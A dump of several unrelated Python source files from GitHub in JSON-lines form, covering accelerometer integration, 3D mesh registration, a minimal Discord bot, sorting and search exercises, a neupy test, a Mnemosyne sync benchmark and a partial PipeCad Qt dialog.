open('C:\\\\Users\\\\1\\\\Desktop\\\\dataset\\\\AccelerationExplorer-2020-6-21-11-22-50.csv') as csvfile:\n csv_reader = csv.reader(csvfile) # 使用csv.reader读取csvfile中的文件\n birth_header = next(csv_reader) # 读取第一行每一列的标题\n for row in csv_reader: # 将csv 文件中的数据保存到birth_data中\n birth_data.append(row)\n\nbirth_header.append('v')\nbirth_header.append('pos')\npre = [float(0) for i in row]\n\nfor i in range(len(birth_data)):\n if len(birth_data[i]) < 4 or birth_data[i][1] == '':\n t = birth_data[i][0]\n birth_data[i] = [float(x) for x in pre]\n birth_data[i][0] = float(t)\n else:\n birth_data[i] = [float(x) for x in birth_data[i]]\n pre = birth_data[i]\n\ndef init_colors():\n return ['blue', 'red', 'green', 'black', 'pink', 'purple', 'gray', 'yellow']\n\ndef show_graph(data, save_png_name=None, colors=None):\n \"\"\"\n 绘制折线图\n :param data: 数据格式:{label:{X:Y}, label:{X:Y}...}\n :param save_png_name:保存的图片的名字\n :param colors: 颜色列表\n :return:\n None\n \"\"\"\n # 解决中文显示乱码的问题,不用中文就不需要设置了\n # my_font = font_manager.FontProperties(fname=\"/自己补充路径/IOS8.ttf\")\n\n if colors is None:\n colors = init_colors()\n plt.figure(dpi=512, figsize=(14, 6))\n plts = []\n labels = []\n X = []\n Y = []\n for j in range(1, 6):\n if j == 2 or j == 4 or j == 5:\n for i in range(0, len(data)):\n color = colors[j]\n X.append(i)\n Y.append(data[i][j])\n temp, = plt.plot(X, Y, linewidth=0.5, color=color, label='')\n plts.append(temp)\n X = []\n Y = []\n labels.append(birth_header[1])\n labels.append(birth_header[4])\n labels.append(birth_header[5])\n #labels.append(\"avg_a\")\n plts.append(plt.plot([i for i in range(0, len(data))], [0 for i in range(0, len(data))], linewidth=1, color=\"black\"))\n #plts.append(plt.plot([i for i in range(0, len(data))], avg_arr, linewidth=0.5, color=\"purple\"))\n #plts.append(plt.plot([i for i in range(0, len(data))], avg_arr2, linewidth=0.5, color=\"red\"))\n plt.legend(handles=plts, labels=labels)\n if save_png_name is not None:\n plt.savefig(save_png_name)\n plt.show()\n '''if save_png_name is not None:\n plt.savefig(save_png_name)'''\n\n#birth_data = [[float(x) for x in row] for row in birth_data] # 将数据从string形式转换为float形式\nvel = []\ny = []\nx = []\nfor j in range(0, len(birth_data)):\n x = [birth_data[i][0] for i in range(0, j)]\n y = [birth_data[i][2] for i in range(0, j)]\n v = integrate.trapz(y, x)\n vel.append(v)\n birth_data[j].append(v)\n # print(v)\n\n# y = [birth_data[i][3] for i in range(0, len(birth_data))]\npos = []\nfor j in range(0, len(birth_data)):\n x = [birth_data[i][0] for i in range(0, j)]\n y = [vel[i] for i in range(0, j)]\n pos = integrate.trapz(y, x)\n vel.append(v)\n birth_data[j].append(pos)\n\nprint(str(pos*100) + \"cm\")\nshow_graph(birth_data,\"asas\", init_colors())\n","repo_name":"Wyh199697/local-test","sub_path":"fsensor.py","file_name":"fsensor.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41891010025","text":"\"\"\"\nSheared bunny\n=============\n\n3D meshes registration using implicit modules of order 1. 
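The velocity and position loops above re-run scipy's trapz over a growing prefix at every sample, which is O(n^2) overall. SciPy's cumulative trapezoid rule computes the same series in one pass; a sketch on synthetic constant-acceleration data:

import numpy as np
from scipy.integrate import cumulative_trapezoid  # cumtrapz in older SciPy

t = np.linspace(0.0, 10.0, 1001)              # timestamps, s
a = np.full_like(t, 0.5)                      # constant 0.5 m/s^2
v = cumulative_trapezoid(a, t, initial=0.0)   # velocity, m/s
x = cumulative_trapezoid(v, t, initial=0.0)   # position, m
print(x[-1])                                  # ~25.0, matching a*t**2/2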
Normal frames and growth factor are optimized.\n\"\"\"\n\n###############################################################################\n# Important relevant Python modules.\n#\n\nimport sys\nsys.path.append(\"../\")\n\nimport torch\nimport meshio\n\n\nimport imodal\n\ntorch.set_default_dtype(torch.float64)\nimodal.Utilities.set_compute_backend('keops')\ndevice = 'cuda:2'\n# device = 'cpu'\n\n###############################################################################\n# Load source and target data.\n#\n\ndata_folder = \"../data/\"\nsource_mesh = meshio.read(data_folder+\"bunny.ply\")\ntarget_mesh = meshio.read(data_folder+\"bunny_shear.ply\")\n\nsource_points = torch.tensor(source_mesh.points, dtype=torch.get_default_dtype())\ntarget_points = torch.tensor(target_mesh.points, dtype=torch.get_default_dtype())\nsource_triangles = torch.tensor(source_mesh.cells_dict['triangle'], dtype=torch.long)\ntarget_triangles = torch.tensor(target_mesh.cells_dict['triangle'], dtype=torch.long)\n\n\n###############################################################################\n# Rescaling source and target.\n#\n\nscale_factor = 100.\nsource_points = scale_factor*(source_points - torch.mean(source_points, dim=0))\ntarget_points = scale_factor*(target_points - torch.mean(target_points, dim=0))\n\n\n###############################################################################\n# Generation of implicit module of order 1: points positions, initial growth\n# factor and normal frames.\n#\n\n# Defining an AABB around the source\naabb_source = imodal.Utilities.AABB.build_from_points(1.8*source_points)\n\n# Generation of growth points\nimplicit1_density = 0.1\nimplicit1_points = imodal.Utilities.fill_area_uniform_density(imodal.Utilities.area_convex_hull, aabb_source, implicit1_density, scatter=1.8*source_points)\n\n# Placeholders for growth factor and normal frames\nimplicit1_r = torch.empty(implicit1_points.shape[0], 3, 3)\nimplicit1_c = torch.empty(implicit1_points.shape[0], 3, 1)\n\n# Initial growth factor constants\ngrowth_constants = torch.tensor([[[1.], [1.], [1.]]], requires_grad=True, device=device)\n\n# Initial normal frames angles. 
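The compute_basis helper defined below composes per-point rotation matrices from these angles using IMODAL's rot3d_*_vec helpers and an einsum contraction. A generic torch sketch of the same batched composition, reduced to z-rotations for brevity:

import torch

def rot_z(theta):
    # One 3x3 rotation matrix about the z axis per angle in the batch.
    c, s = torch.cos(theta), torch.sin(theta)
    z, o = torch.zeros_like(theta), torch.ones_like(theta)
    return torch.stack([
        torch.stack([c, -s, z], dim=-1),
        torch.stack([s, c, z], dim=-1),
        torch.stack([z, z, o], dim=-1),
    ], dim=-2)

R1 = rot_z(torch.rand(5))                        # (5, 3, 3), one per point
R2 = rot_z(torch.rand(5))
composed = torch.einsum('nik,nkj->nij', R2, R1)  # batched matrix product
print(composed.shape)                            # torch.Size([5, 3, 3])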
Normal frames are rotation matrices and thus defined by 3 angles.\nangles = torch.zeros(implicit1_points.shape[0], 3, requires_grad=True, device=device)\n\n\n###############################################################################\n# Create the deformation model with a combination of 3 modules : implicit module\n# of order 1 (growth model), implicit module of order 0 (small corrections), global translation\n# and a large scale rotation.\n#\n\n\n###############################################################################\n# Create and initialize the global translation module.\n#\n\nglobal_translation = imodal.DeformationModules.GlobalTranslation(3, coeff=10.)\n\n\n###############################################################################\n# Create and initialize the growth module.\n#\n\nsigma1 = 2.5/implicit1_density**(1/3)\n\nimplicit1 = imodal.DeformationModules.ImplicitModule1(3, implicit1_points.shape[0], sigma1, implicit1_c, nu=1000., gd=(implicit1_points, implicit1_r), coeff=0.001)\n\nprint(\"{} points for the implicit module of order 1.\".format(implicit1_points.shape[0]))\n\n\n###############################################################################\n# Create and initialize the local translations module.\n#\n\nimplicit0_density = 0.25\nsigma0 = 2./implicit0_density**(1/3)\n\nprint(sigma0)\n\nimplicit0_points = imodal.Utilities.fill_area_uniform_density(imodal.Utilities.area_convex_hull, aabb_source, implicit0_density, scatter=1.8*source_points)\n\nimplicit0 = imodal.DeformationModules.ImplicitModule0(3, implicit0_points.shape[0], sigma0, nu=1., gd=implicit0_points, coeff=1000.)\n\nprint(\"{} points for the implicit module of order 0.\".format(implicit0_points.shape[0]))\n\n\n###############################################################################\n# Create and initialize the local large scale rotation.\n#\n\nrotation = imodal.DeformationModules.LocalRotation(3, 30., gd=torch.tensor([[0., 0., 0.], [0., 0., 1.]], device=device, requires_grad=True), backend='torch', coeff=10.)\n\n\n###############################################################################\n# Define our growth factor model.\n#\n\n# Function that computes normal frames from angles.\ndef compute_basis(angles):\n rot_x = imodal.Utilities.rot3d_x_vec(angles[:, 0])\n rot_y = imodal.Utilities.rot3d_y_vec(angles[:, 1])\n rot_z = imodal.Utilities.rot3d_z_vec(angles[:, 2])\n return torch.einsum('nik, nkl, nlj->nij', rot_z, rot_y, rot_x)\n\n\n# Function that computes growth factor from growth factor constants.\ndef compute_growth(growth_constants):\n return growth_constants.repeat(implicit1_points.shape[0], 1, 1)\n\n\n# Callback used by the registration model to compute the new growth factor\n# and normal frames.\ndef precompute(init_manifold, modules, parameters, _):\n init_manifold[1].gd = (init_manifold[1].gd[0], compute_basis(parameters['growth']['params'][0]))\n modules[1].C = compute_growth(parameters['growth']['params'][1])\n\n\n###############################################################################\n# Define deformables used by the registration model.\n#\n\ndeformable_source = imodal.Models.DeformableMesh(source_points, source_triangles)\ndeformable_target = imodal.Models.DeformableMesh(target_points, target_triangles)\n\ndeformable_source.to_device(device)\ndeformable_target.to_device(device)\n\n###############################################################################\n# Define the registration model.\n#\n\nsigmas_varifold = [1., 5., 15.]\nattachment = 
imodal.Attachment.VarifoldAttachment(3, sigmas_varifold)\n\nmodel = imodal.Models.RegistrationModel(deformable_source, [implicit1, implicit0, global_translation, rotation], [attachment], fit_gd=None, lam=100., precompute_callback=precompute, other_parameters={'growth': {'params': [angles, growth_constants]}})\nmodel.to_device(device)\n\n###############################################################################\n# Fitting using Torch LBFGS optimizer.\n#\n\nshoot_solver = 'euler'\nshoot_it = 10\ncosts = {}\nfitter = imodal.Models.Fitter(model, optimizer='torch_lbfgs')\n\nfitter.fit(deformable_target, 500, costs=costs, options={'shoot_solver': shoot_solver, 'shoot_it': shoot_it, 'line_search_fn': 'strong_wolfe', 'history_size': 500})\n\n\n###############################################################################\n# Compute optimized deformation trajectory.\n#\n\nimport time\nintermediates = {}\nstart = time.perf_counter()\nwith torch.autograd.no_grad():\n    deformed = model.compute_deformed(shoot_solver, shoot_it, intermediates=intermediates)[0][0].detach()\nprint(\"Elapsed={elapsed}\".format(elapsed=time.perf_counter()-start))\n\nbasis = compute_basis(angles.detach()).cpu()\nC = compute_growth(growth_constants.detach()).cpu()\nprint(growth_constants.detach().cpu())\n\nimodal.Utilities.export_mesh(\"results_implicit_bunny/source.ply\", source_points.cpu(), source_triangles)\nimodal.Utilities.export_mesh(\"results_implicit_bunny/target.ply\", target_points.cpu(), target_triangles)\nimodal.Utilities.export_implicit1_growth(\"results_implicit_bunny/growth.vtk\", implicit1_points, C)\nimodal.Utilities.export_point_basis(\"results_implicit_bunny/basis.vtk\", implicit1_points, basis)\nimodal.Utilities.export_mesh_points(\"results_implicit_bunny/implicit0_points.vtk\", implicit0_points)\n\nfor i, inter in enumerate(intermediates['states']):\n    imodal.Utilities.export_mesh(\"results_implicit_bunny/{}.ply\".format(i), inter[0].gd.cpu(), source_triangles)\n\nwith open(\"results_implicit_bunny/model.txt\", 'w') as f:\n    f.write(str(model))\n\nwith open(\"results_implicit_bunny/intermediates.pt\", 'wb') as f:\n    torch.save(intermediates, f)\n\n","repo_name":"imodal/imodal","sub_path":"examples/plot_sheared_bunny.py","file_name":"plot_sheared_bunny.py","file_ext":"py","file_size_in_byte":7758,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"18821976125","text":"from bot_token import TOKEN\nimport discord\nimport asyncio\n\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_ready():\n    print(f\"{client.user} подключен!\")\n    for guild in client.guilds:\n        print(\n            f\"{client.user} подключен к чату:\\n\"\n            f\"{guild.name}(id: {guild.id})\"\n        )\n\n\nclient.run(TOKEN)\n","repo_name":"BearForesterSmallBeef/DiscordBot","sub_path":"bot-1-main.py","file_name":"bot-1-main.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35663415145","text":"def selectionsrot(a):\n    for i in range(len(a) - 1):\n        min = i\n        for j in range(i+1, len(a)):\n            if a[min] > a[j]:\n                min = j\n        a[i], a[min] = a[min], a[i]\n\n\n\ndata = [64, 25, 10, 22, 11]\nselectionsrot(data)\nprint(data)\n\n","repo_name":"gogumasitda/TIL","sub_path":"algorithm/01.21/선택정렬.py","file_name":"선택정렬.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"73032901173","text":"import 
numpy as np\n\nfrom neupy import algorithms\n\nfrom base import BaseTestCase\n\n\ndata = np.array([\n [0.11, 0.20],\n [0.25, 0.32],\n [0.64, 0.60],\n [0.12, 0.42],\n [0.70, 0.73],\n [0.30, 0.27],\n [0.43, 0.81],\n [0.44, 0.87],\n [0.12, 0.92],\n [0.56, 0.67],\n [0.36, 0.35],\n])\n\n\nclass RBFKMeansTestCase(BaseTestCase):\n def test_rbfk_exceptions(self):\n with self.assertRaises(ValueError):\n # More clusters than samples\n nw = algorithms.RBFKMeans(n_clusters=1000, verbose=False)\n nw.train(data, epsilon=1e-5)\n\n with self.assertRaises(ValueError):\n # Number of clusters the same as number of samples\n nw = algorithms.RBFKMeans(n_clusters=data.shape[0],\n verbose=False)\n nw.train(data, epsilon=1e-5)\n\n with self.assertRaises(ValueError):\n # One cluster\n nw = algorithms.RBFKMeans(n_clusters=1, verbose=False)\n nw.train(data, epsilon=1e-5)\n\n def test_rbfk_classification(self):\n expected_centers = np.array([\n [0.228, 0.312],\n [0.482, 0.767],\n ])\n\n nw = algorithms.RBFKMeans(n_clusters=2, verbose=False)\n nw.train(data, epsilon=1e-5)\n np.testing.assert_array_almost_equal(expected_centers, nw.centers,\n decimal=3)\n\n def test_rbfk_train_different_inputs(self):\n self.assertInvalidVectorTrain(\n algorithms.RBFKMeans(n_clusters=2, verbose=False),\n np.array([1, 2, 10]),\n )\n\n def test_rbfk_predict_different_inputs(self):\n kmnet = algorithms.RBFKMeans(verbose=False, n_clusters=2)\n\n data = np.array([[1, 2, 10]]).T\n target = np.array([[0, 0, 1]]).T\n\n kmnet.train(data)\n self.assertInvalidVectorPred(kmnet, data.ravel(), target, decimal=2)\n\n def test_rbfk_means_assign_step_exception(self):\n with self.assertRaises(ValueError):\n algorithms.RBFKMeans(n_cluster=2, step=0.01)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/itdxer_neupy/neupy-master/tests/algorithms/rbfn/test_rbf_kmeans.py","file_name":"test_rbf_kmeans.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"2021755979","text":"#!/usr/bin/env python\r\n\r\nimport os\r\nimport time\r\nimport pstats\r\nimport shutil\r\nimport cProfile\r\n\r\nfrom mnemosyne.libmnemosyne import Mnemosyne\r\n\r\nnumber_of_calls = 50 # Number of calls to display in profile\r\nnumber_of_facts = 6000\r\n\r\nfrom openSM2sync.server import Server\r\nfrom openSM2sync.client import Client\r\nfrom openSM2sync.log_entry import EventTypes\r\n\r\nfrom mnemosyne.libmnemosyne import Mnemosyne\r\nfrom mnemosyne.libmnemosyne.fact import Fact\r\nfrom mnemosyne.libmnemosyne.ui_components.main_widget import MainWidget\r\nfrom mnemosyne.libmnemosyne.ui_components.review_widget import ReviewWidget\r\n\r\nclass Widget(MainWidget):\r\n\r\n def set_progress_text(self, text):\r\n print(text)\r\n\r\n def show_information(self, info):\r\n print(info)\r\n\r\n def show_error(self, error):\r\n print(error)\r\n\r\nclass MyReviewWidget(ReviewWidget):\r\n\r\n def redraw_now(self):\r\n pass\r\n\r\n\r\nclass MyClient(Client):\r\n\r\n program_name = \"Mnemosyne\"\r\n program_version = \"test\"\r\n capabilities = \"TODO\"\r\n\r\n def __init__(self):\r\n shutil.rmtree(os.path.abspath(\"dot_sync_client\"), ignore_errors=True)\r\n self.mnemosyne = Mnemosyne(upload_science_logs=False, interested_in_old_reps=True)\r\n self.mnemosyne.components = [\r\n (\"mnemosyne.libmnemosyne.gui_translator\",\r\n \"NoGuiTranslation\"),\r\n (\"mnemosyne.libmnemosyne.databases.SQLite\",\r\n \"SQLite\"),\r\n (\"mnemosyne.libmnemosyne.configuration\",\r\n \"Configuration\"),\r\n 
(\"mnemosyne.libmnemosyne.loggers.database_logger\",\r\n \"DatabaseLogger\"),\r\n (\"mnemosyne.libmnemosyne.schedulers.SM2_mnemosyne\",\r\n \"SM2Mnemosyne\"),\r\n (\"mnemosyne.libmnemosyne.stopwatch\",\r\n \"Stopwatch\"),\r\n (\"mnemosyne.libmnemosyne.card_types.front_to_back\",\r\n \"FrontToBack\"),\r\n (\"mnemosyne.libmnemosyne.card_types.both_ways\",\r\n \"BothWays\"),\r\n (\"mnemosyne.libmnemosyne.card_types.vocabulary\",\r\n \"Vocabulary\"),\r\n (\"mnemosyne.libmnemosyne.renderers.html_css\",\r\n \"HtmlCss\"),\r\n (\"mnemosyne.libmnemosyne.filters.escape_to_html\",\r\n \"EscapeToHtml\"),\r\n (\"mnemosyne.libmnemosyne.filters.expand_paths\",\r\n \"ExpandPaths\"),\r\n (\"mnemosyne.libmnemosyne.filters.latex\",\r\n \"Latex\"),\r\n (\"mnemosyne.libmnemosyne.render_chains.default_render_chain\",\r\n \"DefaultRenderChain\"),\r\n (\"mnemosyne.libmnemosyne.render_chains.plain_text_chain\",\r\n \"PlainTextChain\"),\r\n (\"mnemosyne.libmnemosyne.controllers.default_controller\",\r\n \"DefaultController\"),\r\n (\"mnemosyne.libmnemosyne.review_controllers.SM2_controller\",\r\n \"SM2Controller\"),\r\n (\"mnemosyne.libmnemosyne.card_types.map\",\r\n \"MapPlugin\"),\r\n (\"mnemosyne.libmnemosyne.card_types.cloze\",\r\n \"ClozePlugin\"),\r\n (\"mnemosyne.libmnemosyne.criteria.default_criterion\",\r\n \"DefaultCriterion\"),\r\n (\"mnemosyne.libmnemosyne.databases.SQLite_criterion_applier\",\r\n \"DefaultCriterionApplier\"),\r\n (\"mnemosyne.libmnemosyne.plugins.cramming_plugin\",\r\n \"CrammingPlugin\") ]\r\n self.mnemosyne.components.append((\"benchmark_sync_client\", \"Widget\"))\r\n self.mnemosyne.components.append((\"benchmark_sync_client\", \"MyReviewWidget\"))\r\n self.mnemosyne.initialise(os.path.abspath(os.path.join(os.getcwd(),\r\n \"dot_sync_client\")), automatic_upgrades=False)\r\n self.mnemosyne.config().change_user_id(\"user_id\")\r\n self.check_for_edited_local_media_files = False\r\n self.do_backup = False\r\n self.mnemosyne.review_controller().reset()\r\n # Do 200 reviews.\r\n card_type = self.mnemosyne.card_type_with_id(\"1\")\r\n fact_data = {\"f\": \"question\",\r\n \"b\": \"answer\"}\r\n card = self.mnemosyne.controller().create_new_cards(fact_data, card_type,\r\n grade=-1, tag_names=[\"default\"])[0]\r\n self.mnemosyne.database().save()\r\n self.mnemosyne.review_controller().show_new_question()\r\n for i in range(200):\r\n self.mnemosyne.review_controller().show_answer()\r\n self.mnemosyne.review_controller().grade_answer(0)\r\n Client.__init__(self, \"client_machine_id\", self.mnemosyne.database(),\r\n self.mnemosyne.main_widget())\r\n\r\n def do_sync(self):\r\n #self.BUFFER_SIZE = 10*8192\r\n #self.behind_proxy = True\r\n self.sync(\"localhost\", 8186, \"user\", \"pass\")\r\n self.mnemosyne.database().save()\r\n\r\nif __name__== '__main__':\r\n\r\n client = MyClient()\r\n\r\n def sync():\r\n client.do_sync()\r\n\r\n tests = [\"sync()\"]\r\n\r\n for test in tests:\r\n cProfile.run(test, \"mnemosyne_profile.\" + test.replace(\"()\", \"\"))\r\n print()\r\n print((\"*** \", test, \" ***\"))\r\n print()\r\n p = pstats.Stats('mnemosyne_profile.' 
+ test.replace(\"()\", \"\"))\r\n p.strip_dirs().sort_stats('cumulative').print_stats(number_of_calls)\r\n","repo_name":"mnemosyne-proj/mnemosyne","sub_path":"tests/benchmark_sync_client.py","file_name":"benchmark_sync_client.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","stars":443,"dataset":"github-code","pt":"21"} +{"seq_id":"27841976443","text":"# 34\n# Given arry of int nums sorted in ascending order, find starting and ending position of given target value.\n\nfrom typing import List, Tuple\n\n\ndef brute_force_soln(nums: List[int], target: int) -> List[int]:\n left = 0\n right = len(nums) - 1\n low = -1\n high = -1\n while left <= right:\n mid = (left + right) // 2\n val = nums[mid]\n if val == target:\n ileft = mid - 1\n iright = mid + 1\n low = mid\n high = mid\n while ileft >= 0:\n if nums[ileft] == target:\n low = ileft\n ileft -= 1\n else:\n break\n while iright < len(nums):\n if nums[iright] == target:\n high = iright\n iright += 1\n else:\n break\n return [low, high]\n if val < target:\n left = mid + 1\n else:\n right = mid - 1\n return [low, high]\n\n\ninput1 = [5, 7, 7, 8, 8, 10]\ntarget1 = 8 # [3, 4]\ninput2 = [5, 7, 7, 8, 8, 10]\ntarget2 = 6 # [-1, -1]\ninput3 = []\ntarget3 = 0 # [-1, -1]\ninput4 = [1, 3, 3, 5, 5, 5, 8, 9]\ntarget4 = 5 # [3, 5]\ninput5 = [1, 2, 3, 4, 5, 6]\ntarget5 = 4 # [3, 3]\ninput6 = [1]\ntarget6 = 1 # [0, 0]\n\n\nprint(brute_force_soln(input1, target1))\nprint(brute_force_soln(input2, target2))\nprint(brute_force_soln(input3, target3))\nprint(brute_force_soln(input4, target4))\nprint(brute_force_soln(input5, target5))\n\n\ndef soln(nums: List[int], target: int) -> List[int]:\n def binary_search(nums: List[int], target: int) -> Tuple[bool, int]:\n left = 0\n right = len(nums) - 1\n while left <= right:\n mid = (left + right) // 2\n val = nums[mid]\n if val == target:\n return True, mid\n elif val < target:\n left = mid + 1\n else:\n right = mid - 1\n return False, -1\n\n low = -1\n high = -1\n found, first_found = binary_search(nums, target)\n if found:\n low = first_found\n high = first_found\n while low >= 0:\n left_found, left = binary_search(nums[:low], target)\n if not left_found:\n break\n low = left\n while high < len(nums):\n right_found, right = binary_search(nums[high + 1:], target)\n if not right_found:\n break\n high = (right + high + 1)\n\n return [low, high]\n\n\nprint(soln(input1, target1))\nprint(soln(input2, target2))\nprint(soln(input3, target3))\nprint(soln(input4, target4))\nprint(soln(input5, target5))\nprint(soln(input6, target6))\n\n\ndef soln2(nums: List[int], target: int) -> List[int]:\n def binary_search(nums: List[int], left: int, right: int, target: int) -> int:\n while left <= right:\n mid = (left + right) // 2\n val = nums[mid]\n if val == target:\n return mid\n elif val < target:\n left = mid + 1\n else:\n right = mid - 1\n return -1\n\n if len(nums) == 0:\n return [-1, -1]\n first_pos = binary_search(nums, 0, len(nums) - 1, target)\n if first_pos == -1:\n return [-1, -1]\n start_pos = first_pos\n end_pos = first_pos\n while start_pos != -1:\n temp1 = start_pos\n start_pos = binary_search(nums, 0, start_pos - 1, target)\n start_pos = temp1\n while end_pos != -1:\n temp2 = end_pos\n end_pos = binary_search(nums, end_pos + 1, len(nums) - 1, target)\n end_pos = temp2\n return [start_pos, end_pos]\n\n\nprint(soln2(input1, target1))\nprint(soln2(input2, target2))\nprint(soln2(input3, target3))\nprint(soln2(input4, target4))\nprint(soln2(input5, target5))\nprint(soln2(input6, 
target6))\n","repo_name":"raymondng76/Python-Playground","sub_path":"Udemy_Master_Coding_Interview/Q14_Start_And_End_Of_Target_In_A_Sorted_Array.py","file_name":"Q14_Start_And_End_Of_Target_In_A_Sorted_Array.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5116506743","text":"from PythonQt.QtCore import *\nfrom PythonQt.QtGui import *\nfrom PythonQt.QtSql import *\n\nfrom pipecad import *\n\n\nclass CreateDialog(QDialog):\n def __init__(self, parent = None):\n QDialog.__init__(self, parent)\n \n self.setupUi()\n # __init__\n\n def setupUi(self):\n self.resize(280, 100)\n self.setWindowTitle(QT_TRANSLATE_NOOP(\"Paragon\", \"Create Coco Table\"))\n\n self.verticalLayout = QVBoxLayout(self)\n self.formLayout = QFormLayout()\n\n # Name\n self.labelName = QLabel(\"Name\")\n self.textName = QLineEdit()\n\n self.formLayout.setWidget(0, QFormLayout.LabelRole, self.labelName)\n self.formLayout.setWidget(0, QFormLayout.FieldRole, self.textName)\n\n # Purpose\n self.labelPurpose = QLabel(\"Purpose\")\n self.comboPurpose = QComboBox()\n self.comboPurpose.setEditable(True)\n self.comboPurpose.addItem(\"PIPE\")\n self.comboPurpose.addItem(\"STL\")\n self.comboPurpose.addItem(\"NOZZ\")\n self.comboPurpose.addItem(\"EQUI\")\n\n self.formLayout.setWidget(1, QFormLayout.LabelRole, self.labelPurpose)\n self.formLayout.setWidget(1, QFormLayout.FieldRole, self.comboPurpose)\n\n self.verticalLayout.addLayout(self.formLayout)\n\n self.buttonBox = QDialogButtonBox()\n self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)\n\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n self.verticalLayout.addWidget(self.buttonBox)\n # setupUi\n\n def accept(self):\n\n aName = self.textName.text\n aPurpose = self.comboPurpose.currentText\n\n try:\n PipeCad.StartTransaction(\"Create Coco Table\")\n\n PipeCad.CreateItem(\"CCTA\", aName)\n aCctaItem = PipeCad.CurrentItem()\n aCctaItem.Purpose = aPurpose\n\n PipeCad.CommitTransaction()\n except Exception as e:\n QMessageBox.critical(self, \"\", e)\n raise e\n # try\n\n QDialog.accept(self)\n # accept\n# CreateDialog\n\n# Singleton Instance.\naCreateDlg = CreateDialog(PipeCad)\n\ndef Create():\n aCreateDlg.show()\n# Create\n\n\nclass ComboBoxDelegate(QItemDelegate):\n def __init__(self, parent = None):\n QItemDelegate.__init__(self, parent)\n # __init__\n\n def setupCoco(self, theCctaItem):\n self.cocoTypes = []\n if theCctaItem is None:\n return\n # if\n\n aCcdeList = PipeCad.CollectItem(\"CCDE\", theCctaItem)\n for aCcdeItem in aCcdeList:\n self.cocoTypes.append(aCcdeItem.Connection)\n # for\n # setupCoco\n\n def createEditor(self, theParent, theOption, theIndex):\n anEditor = QComboBox(theParent)\n #anEditor.setEditable(True)\n anEditor.addItems(self.cocoTypes)\n return anEditor\n # createEditor\n\n def setEditorData(self, theEditor, theIndex):\n aText = theIndex.data()\n if aText is not None:\n theEditor.setCurrentText(aText)\n # if\n # setEditorData\n\n def setModelData(self, theEditor, theModel, theIndex):\n theModel.setData(theIndex, theEditor.currentText)\n # setModelData\n\n# ComboBoxDelegate\n\nclass CocdesDialog(QDialog):\n def __init__(self, parent = None):\n QDialog.__init__(self, parent)\n \n self.setupUi()\n # __init__\n\n def setupUi(self):\n self.resize(380, 500)\n self.setWindowTitle(QT_TRANSLATE_NOOP(\"Paragon\", \"COCO Description\"))\n\n self.verticalLayout = QVBoxLayout(self)\n\n 
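# Note (editor's inference, not upstream documentation): each row of the\n        # grid below holds one connection type, column 0 its name and column 1\n        # its free-text description; the 18-row size is only an initial\n        # allocation that fillForm() and addRow() adjust later.\n        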
self.tableWidget = QTableWidget(18, 2)\n self.tableWidget.setHorizontalHeaderLabels([\"Name\", \"Description\"])\n self.tableWidget.setAlternatingRowColors(True)\n self.tableWidget.horizontalHeader().setDefaultSectionSize(60)\n self.tableWidget.verticalHeader().setDefaultSectionSize(18)\n self.tableWidget.horizontalHeader().setStretchLastSection(True)\n\n self.verticalLayout.addWidget(self.tableWidget)\n\n self.horizontalLayout = QHBoxLayout()\n\n self.buttonAdd = QPushButton(\"Add\")\n self.buttonAdd.clicked.connect(self.addRow)\n\n self.buttonDelete = QPushButton(\"Delete\")\n self.buttonDelete.clicked.connect(self.deleteRow)\n\n # Spacer Item.\n aSpacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n \n # Dialog Buttons.\n self.buttonBox = QDialogButtonBox()\n self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)\n\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n self.horizontalLayout.addWidget(self.buttonAdd)\n self.horizontalLayout.addWidget(self.buttonDelete)\n self.horizontalLayout.addItem(aSpacerItem)\n self.horizontalLayout.addWidget(self.buttonBox)\n\n self.verticalLayout.addLayout(self.horizontalLayout)\n # setupUi\n\n def fillForm(self, theCctaItem):\n if theCctaItem is None:\n return\n # if\n\n aCcdeList = PipeCad.CollectItem(\"CCDE\", theCctaItem)\n self.tableWidget.setRowCount(len(aCcdeList) + 1)\n for i in range (len(aCcdeList)):\n aCcdeItem = aCcdeList[i]\n self.tableWidget.setItem(i, 0, QTableWidgetItem(aCcdeItem.Connection))\n self.tableWidget.setItem(i, 1, QTableWidgetItem(aCcdeItem.Description))\n # for\n # fillForm\n\n def addRow(self):\n aRow = self.tableWidget.rowCount\n self.tableWidget.insertRow(aRow)\n # addRow\n\n def deleteRow(self):\n aAnswer = QMessageBox.question(self, \"\", \"Are you sure to delete the selected row?\")\n if aAnswer != QMessageBox.Yes:\n return\n # if\n\n aRows = []\n for aItem in self.tableWidget.selectedItems():\n aRows.append(aItem.row())\n # for\n\n # Remove duplicate row.\n aRows = list(set(aRows))\n if len(aRows) < 1:\n return\n # if\n\n aRows.sort(reverse=True)\n for r in aRows:\n self.tableWidget.removeRow(r)\n # for\n # deleteRow\n\n# CocdesDialog\n\nclass ModifyDialog(QDialog):\n def __init__(self, parent = None):\n QDialog.__init__(self, parent)\n self.cocoTable = None\n self.setupUi()\n # __init__\n\n def setupUi(self):\n self.resize(580, 360)\n self.setWindowTitle(QT_TRANSLATE_NOOP(\"Paragon\", \"Modify COCO Table\"))\n\n self.verticalLayout = QVBoxLayout(self)\n self.formLayout = QFormLayout()\n\n # Name\n self.buttonCE = QPushButton(\"CE\")\n 